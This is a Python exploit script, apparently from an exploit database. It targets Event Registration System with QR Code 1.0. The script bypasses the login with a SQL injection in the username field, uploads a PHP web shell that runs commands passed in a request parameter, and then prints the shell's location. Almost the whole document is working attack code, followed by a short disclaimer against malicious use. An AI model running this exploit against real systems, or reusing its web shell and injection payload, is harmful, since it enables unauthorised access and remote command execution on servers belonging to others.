Event Registration System With QR Code 1.0 Shell Upload

`# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE  
# Exploit Author: Javier Olmedo  
# Date: 27/07/2021  
# Vendor: Sourcecodester  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip  
# Affected Version: 1.0  
# Category: WebApps  
# Platform: PHP  
# Tested on: Ubuntu Server & Windows 10 Pro  
  
import os, re, sys, argparse, requests  
from termcolor import cprint  
  
def banner():  
os.system("cls")  
print('''  
___________ __   
\_ _____/__ __ ____ _____/ |_   
| __)_\ \/ // __ \ / \ __\\  
| \\\\ /\ ___/| | \ |   
/_______ / \_/ \___ >___| /__|   
\/ \/ \/   
Registration System  
--[Authentication Bypass and RCE]--  
@jjavierolmedo  
''')   
  
def get_args():  
parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit')  
parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')  
parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy')  
args = parser.parse_args()  
return args   
  
def auth_bypass(s, proxies, url):  
data = {  
"username":"admin'#",  
"password":""  
}  
  
r = s.post(url, data=data, proxies=proxies)  
  
if('{"status":"success"}' in r.text):  
cprint("[+] Authenticacion Bypass Success!\n", "green")  
return s  
else:  
cprint("[-] Authenticacion Bypass Error!\n", "red")  
sys.exit(0)  
  
def upload_shell(s, proxies, url):  
content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>"  
file = {  
'img':('cmd.php',content)  
}  
  
data = {  
"name":"Event Registration System with QR Code - PHP",  
"short_name":"ERS-QR-PHP",  
}  
  
r = s.post(url, files=file, data=data, proxies=proxies)  
  
if('1' in r.text and r.status_code == 200):  
cprint("[+] Upload Shell Success!\n", "green")  
return s  
else:  
cprint("[-] Upload Shell Error!\n", "red")  
sys.exit(0)  
  
def get_shell_url(s, proxies, url):  
r = s.get(url, proxies=proxies)  
regex = '\_cmd.php"> (.*?)</a></li>'  
shell_name = re.findall(regex, r.text)[0]  
url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name)  
cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green")  
  
def main():  
banner()  
args = get_args()  
target = args.target  
proxies = {'http':'','https':''}  
if args.proxy:  
proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)}  
  
login_url = target + "/event/classes/Login.php?f=rlogin"  
upload_url = target + "/event/classes/SystemSettings.php?f=update_settings"  
shell_url = target + "/event/uploads/"  
  
s = requests.Session()  
s = auth_bypass(s, proxies, login_url)  
s = upload_shell(s, proxies, upload_url)  
s = get_shell_url(s, proxies, shell_url)  
  
if __name__ == "__main__":  
try:  
main()  
except KeyboardInterrupt:  
cprint("[-] User aborted session\n", "red")  
sys.exit(0)  
  
# Disclaimer  
# The information contained in this notice is provided without any guarantee of use or otherwise.  
# The redistribution of this notice is explicitly permitted for insertion into vulnerability  
# databases, provided that it is not modified and due credit is granted to the author.  
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.  
# All content (c)  
# Javier Olmedo  
  
`